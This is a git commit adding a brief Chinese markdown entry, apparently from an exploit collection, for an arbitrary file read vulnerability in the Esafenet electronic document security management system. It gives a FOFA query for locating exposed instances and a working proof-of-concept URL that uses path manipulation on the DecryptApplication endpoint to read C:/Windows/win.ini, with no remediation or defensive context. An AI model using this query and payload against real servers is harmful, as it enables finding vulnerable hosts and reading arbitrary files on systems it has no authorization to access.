Create 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md

2025-02-27 04:39:25 +00:00 · 2024-03-14 16:03:50 +08:00 · 2024-03-14 16:03:50 +08:00 · c6449babc0
commit c6449babc0
parent 840075a99e
1 changed files with 11 additions and 0 deletions
--- a/亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md
+++ b/亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md
@ -0,0 +1,11 @@
+## 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
+
+## fofa
+```
+app="亿赛通电子文档安全管理系统"
+```
+
+## poc
+```
+http://ip/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111
+```